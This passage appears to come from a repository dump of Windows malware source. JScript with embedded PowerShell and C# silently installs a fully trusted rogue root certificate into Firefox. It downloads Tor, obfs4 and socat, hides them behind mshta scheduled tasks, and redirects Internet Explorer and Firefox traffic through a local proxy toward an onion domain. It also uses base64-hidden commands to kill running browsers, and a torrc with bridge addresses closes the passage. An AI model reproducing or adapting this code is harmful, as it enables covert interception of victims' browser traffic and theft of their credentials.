        byte[] bCert = GetCertAsByteArray(sCert);
		IntPtr ipCert = Marshal.AllocHGlobal(bCert.Length);
		try
        {
            DirectoryInfo diInstallPath = GetIP();
            String sCurrentDirectory = Directory.GetCurrentDirectory();
            Directory.SetCurrentDirectory(diInstallPath.FullName);
            foreach(FileInfo fiDll in diInstallPath.GetFiles("*.dll"))
            {
                if (fiDll.Name.Equals("breakpadinjector.dll")) continue;
                LoadWin32Library(fiDll.FullName);
            }
            nssModule = LoadWin32Library(diInstallPath.FullName + "\\nss3.dll");
            if (nssModule.Equals(IntPtr.Zero))
            {
                return false;
            }
            Directory.SetCurrentDirectory(sCurrentDirectory);
            //Init cert
            Marshal.Copy(bCert, 0, ipCert, bCert.Length);
            SECItem CertItem = new SECItem();
            CertItem.iType = 3;     //   *.der
            CertItem.bData = ipCert;
            CertItem.iDataLen = (uint)bCert.Length;
            SECItem[] aCertItem = new SECItem[1];
            aCertItem[0] = CertItem;

            CertTrusts CertTrust = new CertTrusts();
            CertTrust.iSite = 0x10;
            CertTrust.iEmail = 0x10;
            CertTrust.iSoft = 0x10;

            IntPtr CertToImport = new IntPtr();
            IntPtr[] aCertToImport = new IntPtr[1];
            //End init cert
            int status = NSS_Initialize(sProfile, "", "", SECMOD_DB, NSS_INIT_OPTIMIZESPACE);
            if (status != ERROR_SUCCESS)
            {
                return false;
            }
            IntPtr bd = CERT_GetDefaultCertDB();
            if (bd.Equals(IntPtr.Zero))
            {
                NSS_Shutdown();
                return false;
            }
            status = CERT_ImportCerts(bd, 11, 1, ref aCertItem, ref CertToImport, 1, 0, IntPtr.Zero);
            if (status != ERROR_SUCCESS)
            {
                NSS_Shutdown();
                return false;
            }
            Marshal.Copy(CertToImport, aCertToImport, 0, 1);
            status = CERT_ChangeCertTrust(bd, aCertToImport[0], ref CertTrust);
            if ( status != ERROR_SUCCESS) 
            {
                NSS_Shutdown();
                return false;
            };
            CERT_DestroyCertArray(CertToImport, 1);
            NSS_Shutdown();
            return true;
        }
        catch (Exception){}
        finally
        {
            Marshal.FreeHGlobal(ipCert);
            ipCert = IntPtr.Zero;
            NSS_Shutdown();
        }
		return true;
	}
	private String GetProfile()
    {
        String FFProfile = Path.Combine(Environment.GetEnvironmentVariable("APPDATA"), @"Mozilla\Firefox\Profiles");
        if (Directory.Exists(FFProfile))
        {
            if (Directory.GetDirectories(FFProfile, "*.default").Length > 0)
            {
                return Directory.GetDirectories(FFProfile, "*.default")[0];
            }
        }
        return "";
    }
	public byte[] GetCertAsByteArray(String sCert)
    {
        try
        {
            return Convert.FromBase64String(sCert);
        }
        catch (Exception){}
        return null;
    }
	private DirectoryInfo GetIP()
    {
        DirectoryInfo fp = null;
        // get firefox path from registry
        // we'll search the 32bit install location
        RegistryKey localMachine1 = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Mozilla\Mozilla Firefox", false);
        // and lets try the 64bit install location just in case
        RegistryKey localMachine2 = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox", false);

        if (localMachine1 != null)
        {
            try
            {
                string[] installedVersions = localMachine1.GetSubKeyNames();
                // we'll take the first installed version, people normally only have one
                if (installedVersions.Length == 0)
                    throw new IndexOutOfRangeException("No installs of firefox recorded in its key.");

                RegistryKey mainInstall = localMachine1.OpenSubKey(installedVersions[0]);

                // get install directory
                string installString = (string)mainInstall.OpenSubKey("Main").GetValue("Install Directory", null);

                if (installString == null)
                    throw new NullReferenceException("Install string was null");

                fp = new DirectoryInfo(installString);
            }
            catch (Exception)
            {
            }
        }
        else if (localMachine2 != null)
        {
            try
            {
                string[] installedVersions = localMachine2.GetSubKeyNames();
                // we'll take the first installed version, people normally only have one
                if (installedVersions.Length == 0)
                    throw new IndexOutOfRangeException("No installs of firefox recorded in its key.");

                RegistryKey mainInstall = localMachine2.OpenSubKey(installedVersions[0]);

                // get install directory
                string installString = (string)mainInstall.OpenSubKey("Main").GetValue("Install Directory", null);

                if (installString == null)
                    throw new NullReferenceException("Install string was null");
                fp = new DirectoryInfo(installString);
            }
            catch (Exception)
            {
            }
        }
        return fp;
    }
}
"@;
[FF]::GetInstance().Start("%CERT%");
}
AddCertFF", 18 | pstp: "function Unzip
{
param([string]$zipfile, [string]$destination);
$7z = Join-Path $env:Temp '7za.exe';
if (-NOT (Test-Path $7z)){
Try
{
(New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z);
}
Catch{}
}
if ($(Try { Test-Path $7z.trim() } Catch { $false })){
Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
}
else{
$shell = new-object -com shell.application;
$zip = $shell.NameSpace($zipfile);
foreach($item in $zip.items())
{
$shell.Namespace($destination).copyhere($item);
}
}
}
function Base64ToFile
{
param([string]$file, [string]$string);
$bytes=[System.Convert]::FromBase64String($string);
#set-content -encoding byte $file -value $bytes;
[IO.File]::WriteAllBytes($file, $bytes);
}
function AddTask
{
param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir='');
$ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
$td=$ts.NewTask();
$td.RegistrationInfo.Description = 'Does something';
$td.Settings.DisallowStartIfOnBatteries = $False;
$td.Settings.StopIfGoingOnBatteries = $False;
$td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
$LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
$LogonTrigger.StartBoundary=[System.DateTime]::Now;
$LogonTrigger.UserId=$env:username;
$LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
$td.Triggers.Add($LogonTrigger);
if($restart -eq 1){
$TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
$TimeTrigger.StartBoundary=[System.DateTime]::Now;
$TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(20);
$TimeTrigger.Repetition.StopAtDurationEnd=$False;
$td.Triggers.Add($TimeTrigger);
}
$ExecAction=New-Object Microsoft.Win32.TaskScheduler.ExecAction($cmd,$params,$dir);
$td.Actions.Add($ExecAction);
$task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
$task.Run();
}
function ITP{
$File=$env:Temp+'\ts.zip';
$Dest=$env:Temp+'\ts';
(New-Object System.Net.WebClient).DownloadFile('https://api.nuget.org/packages/taskscheduler.2.5.26.nupkg',$File);
if ((Test-Path $Dest) -eq 1){rm -Force -Recurse $Dest;}md $Dest | Out-Null;
Unzip $File $Dest;
rm -Force $File;
$TSAssembly=$Dest+'\lib\net20\Microsoft.Win32.TaskScheduler.dll';
$loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
$TFile=$env:Temp+'\t.zip';
$DestTP=$env:APPDATA+'\MS';
(New-Object System.Net.WebClient).DownloadFile('https://dist.torproject.org/torbrowser/7.0/tor-win32-0.3.0.7.zip',$TFile);
if ((Test-Path $DestTP) -eq 1){rm -Force -Recurse $DestTP;}md $DestTP | Out-Null;
Unzip $TFile $DestTP;
rm -Force $TFile;
$tor=$DestTP+'\Tor\tor.exe';
$obfs4=$DestTP+'\Tor\obfs4proxy.exe';
(New-Object System.Net.WebClient).DownloadFile('https://github.com/garethflowers/tor-browser-portable/raw/master/TorBrowserPortable/App/TorBrowser/TorBrowser/Tor/PluggableTransports/obfs4proxy.exe',$obfs4);
if ($(Try { Test-Path $obfs4.trim() } Catch { $false })){
$tor_dir=$env:APPDATA+'\tor';
if ((Test-Path $tor_dir) -eq 1){rm -Force -Recurse $tor_dir;}md $tor_dir | Out-Null;
$torrc=$tor_dir+'\torrc';
Base64ToFile $torrc 'VXNlQnJpZGdlcyAxDQpDbGllbnRUcmFuc3BvcnRQbHVnaW4gb2JmczQgZXhlYyBvYmZzNHByb3h5LmV4ZSBtYW5hZ2VkDQpCcmlkZ2Ugb2JmczQgMTk0LjEzMi4yMDkuMTU0OjU5ODg4IEI4MzdFRjAzODNDMEIxMzMwQTk4N0I5QzVERkI2RjJDQkRBMzVDQUEgY2VydD1xS0pWd2NzZHhFbFB6TWJvdzIxcm9qSFJDQlpkeEFkd3V4WG5RVTFsZy9zOUlGNWVoKzd1aWltYnBrVEV3Ulh1TVRFUlR3IGlhdC1tb2RlPTANCkJyaWRnZSBvYmZzNCA0NS41NS4xLjc0Ojk0NDMgNkYxOEZFRkJCMENBRUNENUFCQTc1NTMxMkZDQ0IzNEZDMTFBN0FCOCBjZXJ0PXc4SC94NmlnQ3hsaWdiRjJYQkljeE5FV3EremlVOWgxNXJ0d2lrODJvQXFOWFp3SjI1b0h3YWx6UllLNVdPSklBZUtjQ1EgaWF0LW1vZGU9MA0KQnJpZGdlIG9iZnM0IDM4LjIyOS4zMy4xNDY6NDQ5NTAgOTY5RDA3MUJEODlBNjhDMTU5NDkxNTZDRDFDQTI5QTMzQUY2MzVDMiBjZXJ0PXZiYWg2akRrS1MwTlJxVzF4Z0tnNktkM1VucjFQMTI1dkR2RDlGYllvZFovZnNxUS9NV0RLMjc3UE5BSmlHdWR6SEVCR2cgaWF0LW1vZGU9MQ0KQnJpZGdlIG9iZnM0IDE5NC4xMzIuMjA5LjE5OjQxNDc4IDc4M0UyNzZDNjg4OUJGNzM5MDdGMjk1QUE5MzIxOUY3NzYyQkI5MDYgY2VydD1vRDBJeDVQT3JSTVdFMEY0YXRzNFRTYlZIdyt4MzUrQ2VXZXNvbThTNVJ4cjlWNmRUTm9vWGI1UWViRUlGTGU3OFlpY0x3IGlhdC1tb2RlPTANCkJyaWRnZSBvYmZzNCAxOTIuMzYuMzEuMTIyOjQ0OTk0IDYzRjUxNjg4QjM4OTY2NkRCMEYwNTU2QzU2RTk3OTUxNkQyQjlEMzggY2VydD1RS1hJQmcrcmU3ZkxpbW1CTWJKbnRiVTd3d3cwVWExQ2ZPVS9YK1lVc1AxSTNOc3FLUkNKWDlXVDZRVGE5SG1teGkxOFhnIGlhdC1tb2RlPTANCkJyaWRnZSBvYmZzNCA1NC4yMDIuMTM1LjE1Ojk0NDMgMzdENjExRjJDMTNCODA2N0ZENzJDMzk3MDZCQzE1NENGMkM4Mzk3OCBjZXJ0PU5LV3FJbmR2NVB6ZDF6YnFIKzc4TzBFU1U3czJhNmNjKzZoOTFOYnNzbXNmejVUTXAxWFdxcWVwelh4TkN1eEhFeFg0QkEgaWF0LW1vZGU9MA0KQnJpZGdlIG9iZnM0IDM1LjE4Ny4yMTYuMjMwOjk0NDMgMzU0N0ZGRjlGNkFGNTEwOTNFMTI5MEVCOTEwMTk5QTdFOTIwODUxMiBjZXJ0PVdjWFIzZkVIZUF3NWJISjNScXIvdkFoTHp5ZC9XL3cwYmlzbk9jZmxtYy9IU0NiTTVGWXF0UVFGZE9ObEl1Z3dkS205ZXcgaWF0LW1vZGU9MA0KQnJpZGdlIG9iZnM0IDEwOS43NC4xOTguMjUyOjM3NzcxIDgxNjdGMjI1NDA1QkZBNzE2MzNCRDJCQzVCODU5OUExQTgyN0ZDRjMgY2VydD04ZktUY2xndUxJNnZ1RE5ybFRSclZqNDZ2MjNOWVFUczJUVUFwSXBuYXk1MkhVVUIrcUZ4VXpHaTNta2ordEw5bytTQ1p3IGlhdC1tb2RlPTANCg==';
}
$tor=$tor.Replace('\','/');
$tor_cmd="`"javascript:close(new ActiveXObject('WScript.Shell').Run('$tor',0,false))`"";
AddTask 'SUT' 'mshta.exe' $tor_cmd;
$SFile=$env:Temp+'\s.zip';
(New-Object System.Net.WebClient).DownloadFile('https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip',$SFile);
Unzip $SFile $DestTP;
$s_old=$DestTP+'\socat-windows-1.7.2.1\';
rm -Force $SFile;
Rename-Item -path $s_old -newName 's';
$s_fold=$DestTP+'\s\';
$s1cmd='socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:80,socksport=9050';
$s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:5588,socksport=9050';
$s1_cmd="`"javascript:close(new ActiveXObject('WScript.Shell').Run('$s1cmd',0,false))`"";
$s2_cmd="`"javascript:close(new ActiveXObject('WScript.Shell').Run('$s2cmd',0,false))`"";
AddTask 'MRT' 'mshta.exe' $s1_cmd 0 0 $s_fold;
AddTask 'SC' 'mshta.exe' $s2_cmd 0 0 $s_fold;
}
ITP" 19 | }; 20 | var Base64 = { 21 | _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", 22 | encode: function(e) { 23 | var t = ""; 24 | var n, r, i, s, o, u, a; 25 | var f = 0; 26 | e = Base64._utf8_encode(e); 27 | while (f < e.length) { 28 | n = e.charCodeAt(f++); 29 | r = e.charCodeAt(f++); 30 | i = e.charCodeAt(f++); 31 | s = n >> 2; 32 | o = (n & 3) << 4 | r >> 4; 33 | u = (r & 15) << 2 | i >> 6; 34 | a = i & 63; 35 | if (isNaN(r)) { 36 | u = a = 64 37 | } else if (isNaN(i)) { 38 | a = 64 39 | } 40 | t = t + this._keyStr.charAt(s) + this._keyStr.charAt(o) + 41 | this._keyStr.charAt(u) + this._keyStr.charAt(a) 42 | } 43 | return t 44 | }, 45 | decode: function(e) { 46 | var t = ""; 47 | var n, r, i; 48 | var s, o, u, a; 49 | var f = 0; 50 | e = e.replace(/[^A-Za-z0-9+/=]/g, ""); 51 | while (f < e.length) { 52 | s = this._keyStr.indexOf(e.charAt(f++)); 53 | o = this._keyStr.indexOf(e.charAt(f++)); 54 | u = this._keyStr.indexOf(e.charAt(f++)); 55 | a = this._keyStr.indexOf(e.charAt(f++)); 56 | n = s << 2 | o >> 4; 57 | r = (o & 15) << 4 | u >> 2; 58 | i = (u & 3) << 6 | a; 59 | t = t + String.fromCharCode(n); 60 | if (u != 64) { 61 | t = t + String.fromCharCode(r) 62 | } 63 | if (a != 64) { 64 | t = t + String.fromCharCode(i) 65 | } 66 | } 67 | t = Base64._utf8_decode(t); 68 | return t 69 | }, 70 | _utf8_encode: function(e) { 71 | e = e.replace(/rn/g, "n"); 72 | var t = ""; 73 | for (var n = 0; n < e.length; n++) { 74 | var r = e.charCodeAt(n); 75 | if (r < 128) { 76 | t += String.fromCharCode(r) 77 | } else if (r > 127 && r < 2048) { 78 | t += String.fromCharCode(r >> 6 | 192); 79 | t += String.fromCharCode(r & 63 | 128) 80 | } else { 81 | t += String.fromCharCode(r >> 12 | 224); 82 | t += String.fromCharCode(r >> 6 & 63 | 128); 83 | t += String.fromCharCode(r & 63 | 128) 84 | } 85 | } 86 | return t 87 | }, 88 | _utf8_decode: function(e) { 89 | var t = ""; 90 | var n = 0; 91 | var r = c1 = c2 = 0; 92 | while (n < e.length) { 93 | r = e.charCodeAt(n); 94 | if (r < 128) { 95 | t += String.fromCharCode(r); 96 | n++ 97 | } else if (r > 191 && r < 224) { 98 | c2 = e.charCodeAt(n + 1); 99 | t += String.fromCharCode((r & 31) << 6 | c2 & 63); 100 | n += 2 101 | } else { 102 | c2 = e.charCodeAt(n + 1); 103 | c3 = e.charCodeAt(n + 2); 104 | t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 105 | 6 | c3 & 63); 106 | n += 3 107 | } 108 | } 109 | return t 110 | } 111 | }; 112 | var Help = { 113 | BinaryDataToFile: function(sFileName, bData) { 114 | var streamW = new ActiveXObject("ADODB.Stream"); 115 | streamW.Open(); 116 | streamW.Type = BINARY_STREAM_TYPE; 117 | var rs = new ActiveXObject("ADODB.Recordset"); 118 | var len = bData.length * 2; 119 | rs.Fields.Append("data", 204, len, 0x80); 120 | rs.Open(); 121 | rs.AddNew(); 122 | rs.Fields("data").AppendChunk(bData); 123 | rs.Update(); 124 | rs.MoveFirst(); 125 | var binArray = rs("data").GetChunk(len); 126 | rs.Close(); 127 | streamW.Write(binArray); 128 | streamW.Position = 0; 129 | if (fso.FileExists(sFileName)) { 130 | fso.DeleteFile(sFileName) 131 | } 132 | streamW.SaveToFile(sFileName); 133 | streamW.Close(); 134 | var outStreamA = new ActiveXObject("ADODB.Stream"); 135 | var outStreamB = new ActiveXObject("ADODB.Stream"); 136 | outStreamA.Type = TEXT_STREAM_TYPE; 137 | outStreamB.Type = TEXT_STREAM_TYPE; 138 | outStreamB.Charset = "ISO-8859-1"; 139 | outStreamA.Open(); 140 | outStreamB.Open(); 141 | outStreamA.LoadFromFile(sFileName); 142 | outStreamA.Position = 0; 143 | outStreamA.CopyTo(outStreamB); 144 | outStreamA.Close(); 145 | outStreamB.SaveToFile(sFileName, CREATE_OVERWRITE_SAVE_MODE); 146 | outStreamB.Close() 147 | }, 148 | RandomNumber: function(m, n) { 149 | m = parseInt(m, 10); 150 | n = parseInt(n, 10); 151 | return Math.floor(Math.random() * (n - m + 1)) + m 152 | }, 153 | GenStr: function(length, special) { 154 | var iteration = 0; 155 | var password = ""; 156 | var randomNumber; 157 | if (special === undefined) { 158 | special = false 159 | } 160 | while (iteration < length) { 161 | randomNumber = (Math.floor((Math.random() * 100)) % 94) + 162 | 33; 163 | if (!special) { 164 | if ((randomNumber >= 33) && (randomNumber <= 47)) { 165 | continue 166 | } 167 | if ((randomNumber >= 58) && (randomNumber <= 64)) { 168 | continue 169 | } 170 | if ((randomNumber >= 91) && (randomNumber <= 96)) { 171 | continue 172 | } 173 | if ((randomNumber >= 123) && (randomNumber <= 126)) { 174 | continue 175 | } 176 | } 177 | iteration++; 178 | password += String.fromCharCode(randomNumber) 179 | } 180 | return password 181 | }, 182 | trim: function(str) { 183 | return str.replace(/(^\s+)|(\s+$)/g, "") 184 | } 185 | }; 186 | if (!String.format) { 187 | String.format = function(format) { 188 | var args = Array.prototype.slice.call(arguments, 1); 189 | return format.replace(/{(\d+)}/g, function(match, number) { 190 | return typeof args[number] != "undefined" ? args[number] : 191 | match 192 | }) 193 | } 194 | } 195 | 196 | function C_IE() { 197 | this.FileName = Help.GenStr(8) + ".ps1"; 198 | this.GetIp = function() { 199 | var xhttp = new ActiveXObject("MSXML2.XMLHTTP"); 200 | try { 201 | xhttp.open("GET", "http://api.ipify.org/", false); 202 | xhttp.send(); 203 | if (xhttp.status == 200) { 204 | return Help.trim(xhttp.responseText) 205 | } 206 | } catch (e) {} 207 | try { 208 | xhttp.open("GET", "http://icanhazip.com/", false); 209 | xhttp.send(); 210 | if (xhttp.status == 200) { 211 | return Help.trim(xhttp.responseText) 212 | } 213 | } catch (e) { 214 | return "" 215 | } 216 | }; 217 | this.InstallPac = function() { 218 | wss.RegWrite(Base64.decode( 219 | "SEtDVVxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxJbnRlcm5ldCBTZXR0aW5nc1xBdXRvRGV0ZWN0" 220 | ), 0, "REG_DWORD"); 221 | for (var i = 0; i < 5; i++) { 222 | var sIp = this.GetIp(); 223 | if (sIp.length > 0) { 224 | this.WriteReg(String.format( 225 | "http://127.0.0.1:5555/{0}.js?ip={1}", Help.GenStr( 226 | 8), sIp)) 227 | } 228 | } 229 | }; 230 | this.WriteReg = function(s) { 231 | wss.RegWrite(Base64.decode( 232 | "SEtDVVxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxJbnRlcm5ldCBTZXR0aW5nc1xBdXRvQ29uZmlnVVJM" 233 | ), s, "REG_SZ") 234 | }; 235 | this.IC = function() { 236 | this.FileName = ENV_TEMP + "\\" + this.FileName; 237 | var bData = Base64.decode(Cfg.ps); 238 | bData = bData.replace("%CERT%", Cfg.cert); 239 | Help.BinaryDataToFile(this.FileName, bData); 240 | wss.Run("powershell -ExecutionPolicy Unrestricted -File \"" + this.FileName + 241 | "\"", 0, true) 242 | }; 243 | this.Close = function() { 244 | if (fso.FileExists(this.FileName)) { 245 | fso.DeleteFile(this.FileName) 246 | } 247 | } 248 | } 249 | 250 | function C_FF() { 251 | var StrFirefoxProfilesDir = ENV_APPDATA + "\\Mozilla\\Firefox\\Profiles"; 252 | this.FileName = Help.GenStr(8) + ".ps1"; 253 | this.GetProfile = function() { 254 | if (fso.FolderExists(StrFirefoxProfilesDir)) { 255 | var ArrFirefoxProfileList = fso.GetFolder(StrFirefoxProfilesDir) 256 | .SubFolders; 257 | if (ArrFirefoxProfileList.Count > 0) { 258 | var e = new Enumerator(ArrFirefoxProfileList); 259 | e.moveFirst(); 260 | while (e.atEnd() == false) { 261 | var folder = e.item(); 262 | if (folder.Name.indexOf(".default") > -1) { 263 | return folder.Path 264 | } 265 | e.moveNext() 266 | } 267 | } 268 | } 269 | return false 270 | }; 271 | this.InstallPac = function() { 272 | var StrProfile = this.GetProfile(); 273 | if (StrProfile != false) { 274 | var StrPrefsJs = StrProfile + Base64.decode("XHByZWZzLmpz"); 275 | if (fso.FileExists(StrPrefsJs)) { 276 | var StrContent = fso.OpenTextFile(StrPrefsJs, 1).ReadAll(); 277 | var ArrContent = StrContent.split("\n"); 278 | var NewArrContent = []; 279 | for (var i = 0; i < ArrContent.length; i++) { 280 | if (ArrContent[i].indexOf("network.dns.blockDotOnion") != 281 | -1) { 282 | ArrContent[i] = ArrContent[i].replace("true", 283 | "false") 284 | } 285 | if (ArrContent[i].indexOf("network.proxy.") == -1 && 286 | ArrContent[i].indexOf( 287 | "security.enterprise_roots.enabled") == -1) { 288 | NewArrContent.push(ArrContent[i]) 289 | } 290 | } 291 | NewArrContent.push( 292 | "user_pref(\"network.dns.blockDotOnion\", false);"); 293 | NewArrContent.push( 294 | "user_pref(\"security.enterprise_roots.enabled\", true);" 295 | ); 296 | StrContent = NewArrContent.join("\n"); 297 | var stream = fso.CreateTextFile(StrPrefsJs, true); 298 | stream.Write(StrContent); 299 | stream.Close() 300 | } 301 | } 302 | }; 303 | this.InstallCert = function() { 304 | this.FileName = ENV_TEMP + "\\" + this.FileName; 305 | var bData = Base64.decode(Cfg.psf); 306 | bData = bData.replace("%CERT%", Cfg.cert); 307 | Help.BinaryDataToFile(this.FileName, bData); 308 | wss.Run("powershell -ExecutionPolicy Unrestricted -File \"" + this.FileName + 309 | "\"", 0, true) 310 | }; 311 | this.Close = function() { 312 | if (fso.FileExists(this.FileName)) { 313 | fso.DeleteFile(this.FileName) 314 | } 315 | } 316 | } 317 | 318 | function C_TP() { 319 | this.FileName = Help.GenStr(8) + ".ps1"; 320 | this.Install = function() { 321 | var indexDomain = Help.RandomNumber(0, Cfg.dl.length - 1); 322 | var Domain = Cfg.dl[indexDomain]; 323 | this.FileName = ENV_TEMP + "\\" + this.FileName; 324 | var bData = Base64.decode(Cfg.pstp); 325 | bData = bData.replace(/%DOMAIN%/g, Domain); 326 | Help.BinaryDataToFile(this.FileName, bData); 327 | wss.Run("powershell -ExecutionPolicy Unrestricted -File \"" + this.FileName + 328 | "\"", 0, true) 329 | }; 330 | this.Close = function() { 331 | if (fso.FileExists(this.FileName)) { 332 | fso.DeleteFile(this.FileName) 333 | } 334 | } 335 | } 336 | 337 | function Core() { 338 | this.Init = function() { 339 | Exp = new C_IE(); 340 | Fire = new C_FF(); 341 | TP = new C_TP() 342 | }; 343 | this.S = function() { 344 | this.Init(); 345 | TP.Install(); 346 | this.CAB(); 347 | this.IIE(); 348 | this.IF(); 349 | this.Close() 350 | }; 351 | this.IIE = function() { 352 | Exp.IC(); 353 | Exp.InstallPac() 354 | }; 355 | this.IF = function() { 356 | Fire.InstallCert(); 357 | Fire.InstallPac() 358 | }; 359 | this.CAB = function() { 360 | wss.Run(Base64.decode("dGFza2tpbGwgL0YgL2ltIGlleHBsb3JlLmV4ZQ=="), 361 | 0, false); 362 | wss.Run(Base64.decode("dGFza2tpbGwgL0YgL2ltIGZpcmVmb3guZXhl"), 0, 363 | false); 364 | wss.Run(Base64.decode("dGFza2tpbGwgL0YgL2ltIGNocm9tZS5leGU="), 0, 365 | false) 366 | }; 367 | this.Close = function() { 368 | Exp.Close(); 369 | Fire.Close(); 370 | TP.Close() 371 | } 372 | } 373 | var main = new Core(); 374 | main.S(); 375 | -------------------------------------------------------------------------------- /torrc: -------------------------------------------------------------------------------- 1 | UseBridges 1 2 | ClientTransportPlugin obfs4 exec obfs4proxy.exe managed 3 | Bridge obfs4 178.62.219.242:9443 2EEFFD91A0FC61CFABD1978E72A035F92A382813 cert=AnnSG9ljfgARf9feBw5W2IGstTXzQieXHLXwhThgSDmpedPuNDNAaXB8zq8oye+Z34c8Hg iat-mode=0 4 | Bridge obfs4 194.132.209.154:59888 B837EF0383C0B1330A987B9C5DFB6F2CBDA35CAA cert=qKJVwcsdxElPzMbow21rojHRCBZdxAdwuxXnQU1lg/s9IF5eh+7uiimbpkTEwRXuMTERTw iat-mode=0 5 | Bridge obfs4 45.55.1.74:9443 6F18FEFBB0CAECD5ABA755312FCCB34FC11A7AB8 cert=w8H/x6igCxligbF2XBIcxNEWq+ziU9h15rtwik82oAqNXZwJ25oHwalzRYK5WOJIAeKcCQ iat-mode=0 6 | Bridge obfs4 38.229.33.146:44950 969D071BD89A68C15949156CD1CA29A33AF635C2 cert=vbah6jDkKS0NRqW1xgKg6Kd3Unr1P125vDvD9FbYodZ/fsqQ/MWDK277PNAJiGudzHEBGg iat-mode=1 7 | Bridge obfs4 194.132.209.19:41478 783E276C6889BF73907F295AA93219F7762BB906 cert=oD0Ix5POrRMWE0F4ats4TSbVHw+x35+CeWesom8S5Rxr9V6dTNooXb5QebEIFLe78YicLw iat-mode=0 8 | Bridge obfs4 192.36.31.122:44994 63F51688B389666DB0F0556C56E979516D2B9D38 cert=QKXIBg+re7fLimmBMbJntbU7www0Ua1CfOU/X+YUsP1I3NsqKRCJX9WT6QTa9Hmmxi18Xg iat-mode=0 9 | --------------------------------------------------------------------------------